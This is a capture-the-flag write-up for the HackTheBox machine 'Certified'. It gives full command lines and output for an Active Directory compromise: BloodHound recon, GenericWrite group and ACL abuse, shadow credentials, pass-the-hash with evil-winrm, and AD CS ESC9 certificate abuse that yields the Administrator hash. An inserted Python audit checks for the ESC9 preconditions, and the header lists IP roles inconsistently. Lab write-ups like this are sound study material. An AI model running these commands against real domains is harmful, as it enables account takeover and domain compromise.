Certified on HackTheBox

Before all

Victim’s IP : 10.10.11.37
Victim’s Host : *.certified.htb
Attacker’s IP : 10.10.11.41

Initial Credential : judith.mader/judith09

RECON

port scan

Command

rustscan -a 10.10.11.41 --ulimit 5000 -- -sC -sV -Pn

Result

Open 10.10.11.41:53
Open 10.10.11.41:88
Open 10.10.11.41:135
Open 10.10.11.41:139
Open 10.10.11.41:389
Open 10.10.11.41:445
Open 10.10.11.41:464
Open 10.10.11.41:593
Open 10.10.11.41:636
Open 10.10.11.41:3268
Open 10.10.11.41:3269
Open 10.10.11.41:5985
Open 10.10.11.41:9389
Open 10.10.11.41:49673
Open 10.10.11.41:49668
Open 10.10.11.41:49666
Open 10.10.11.41:49674
Open 10.10.11.41:49683
Open 10.10.11.41:49716
Open 10.10.11.41:49740
Open 10.10.11.41:52832
.......

A standard AD box: LDAP, SMB, Kerberos and Windows RPC are all exposed.

bloodhound

Command

bloodhound-python -c All -u 'judith.mader' -p 'judith09' -d certified.htb -ns 10.10.11.41 --zip

After loading the data into neo4j and BloodHound, a blatantly obvious attack chain pops right out.


judith.mader -> (GenericWrite) -> Manager Group -> (GenericWrite) -> management_svc

Exploit

GenericWrite to Group

The approach for abusing GenericWrite over a group is:
write yourself in as the group's owner -> grant yourself WriteMembers on it -> add yourself to the group


impacket-owneredit -action write -new-owner 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'Management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

Finally, confirm that you are now a member of the group.

net rpc group members "Management"  -U "certified.htb"/"judith.mader"%"judith09" -S "DC01.certified.htb"

Result

CERTIFIED\management_svc

GenericWrite to User (Shadow Credential)

Start with pywhisker.
Command

pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"

Next, following what I had learned from the previous box, I first tried targetedKerberoast.py; it did get a TGT, but the password could not be cracked…
As always, if you run into problems, sync your clock with the DC.

sudo su
timedatectl set-ntp off
rdate -n 10.10.11.41

Switched to PKINITtools instead.
Use the pfx file created earlier with gettgtpkinit.py to obtain a TGT together with the AS-REP key, then feed that AS-REP key to getnthash.py to pull the NT hash.

python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx R2D0pSI0.pfx -pfx-pass 'u8Fz4h1NP1eVJw5SoDQo' management_svc.ccache
export KRB5CCNAME=management_svc.ccache
python3 getnthash.py certified.htb/management_svc -key 296cf9f3778e6dfe4824724ca105fcc7a81cf85dc1d0c3481aee00c2c092a5f9

Result

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584

Pass The Hash

The Kerberos version is old enough that a regular user can also pass authentication with just the NT hash.

evil-winrm -u 'management_svc' -H 'a091c1832bcdd4677c28b5a6a1295584' -i 10.10.11.41

Privilege Escalation

ca_operator

Continuing in BloodHound, the first thing to notice is that management_svc has GenericAll over ca_operator…

So just reset his password straight from the evil-winrm shell XD

net user ca_operator Whale120

AD CS ESC9

First, a pointer to something you should go study on your own: https://book.hacktricks.xyz/cn/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation

Use certipy to do recon against CS (Certificate Services).

certipy-ad find -u [email protected] -p judith09 -dc-ip 10.10.11.41

Notice that the Enrollment Flag has NoSecurityExtension set, which makes the ESC9 attack path applicable.
The concrete flow is: use GenericWrite to overwrite ca_operator's UPN, then obtain the Admin's NTLM hash by requesting a certificate.

Command

certipy-ad account update -username '[email protected]' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn 'Administrator'
certipy-ad req -username '[email protected]' -p 'Whale120' -ca certified-DC01-CA -template CertifiedAuthentication -debug
certipy-ad auth -pfx administrator.pfx -domain 'CERTIFIED.HTB' -dc-ip 10.10.11.41 -username Administrator -debug

Result

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
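As an added defensive check (example code written for this writeup, not from the original post or from Certipy), the following Python evaluates whether a template's settings still satisfy the template-side ESC9 preconditions that the certipy recon above surfaced: NoSecurityExtension in msPKI-Enrollment-Flag, an EKU that permits client authentication, and a KDC StrongCertificateBindingEnforcement value below full enforcement. The template records are constructed sample data, and the flag values shown for CertifiedAuthentication are assumed rather than copied from the certipy output.

```python
from dataclasses import dataclass

# MS-CRTD msPKI-Enrollment-Flag bit that suppresses the szOID_NTDS_CA_SECURITY_EXT
# (objectSid) extension in issued certificates; Certipy reports it as NoSecurityExtension.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# EKU OIDs that let a certificate be used to log on as its subject.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


@dataclass(frozen=True)
class Template:
    name: str
    enrollment_flag: int   # raw msPKI-Enrollment-Flag value
    ekus: frozenset        # pKIExtendedKeyUsage OIDs; an empty set means any purpose
    enabled: bool          # published on at least one CA


def template_allows_esc9(t: Template, strong_binding_enforcement: int) -> bool:
    """Template-side ESC9 preconditions only; enrollment ACLs and the GenericWrite
    over a victim account are checked elsewhere. strong_binding_enforcement is the
    KDC's StrongCertificateBindingEnforcement value: 0 disabled, 1 compatibility,
    2 full enforcement. At 2 the KDC rejects certificates lacking the SID
    extension, which closes ESC9 regardless of the template flags."""
    if strong_binding_enforcement == 2 or not t.enabled:
        return False
    if not t.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        return False
    return not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS)


def esc9_findings(templates, strong_binding_enforcement: int) -> list:
    """Names of published templates that still satisfy the ESC9 preconditions."""
    return [t.name for t in templates if template_allows_esc9(t, strong_binding_enforcement)]


# Constructed sample data for this example; flag values are assumed, not taken from the box.
SAMPLE_TEMPLATES = [
    Template("CertifiedAuthentication", 0x00080000 | 0x20, frozenset({"1.3.6.1.5.5.7.3.2"}), True),
    Template("User", 0x20 | 0x1, frozenset({"1.3.6.1.5.5.7.3.2"}), True),       # flag not set
    Template("WebServer", 0x00080000, frozenset({"1.3.6.1.5.5.7.3.1"}), True),  # server auth only
    Template("OldLogon", 0x00080000, frozenset(), False),                       # not published
]

if __name__ == "__main__":
    print(esc9_findings(SAMPLE_TEMPLATES, 1))  # ['CertifiedAuthentication']
```

Remediation on the defender's side is the inverse of the check: clear the flag on templates that need client authentication, or move the KDC to full enforcement, and re-run the audit until it returns an empty list.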

Finally, one more Pass The Hash, this time against Administrator, and we are done.

evil-winrm -u 'Administrator' -H '0d5b49608bbce1751f708748f67e2d34' -i 10.10.11.41

PWNED!!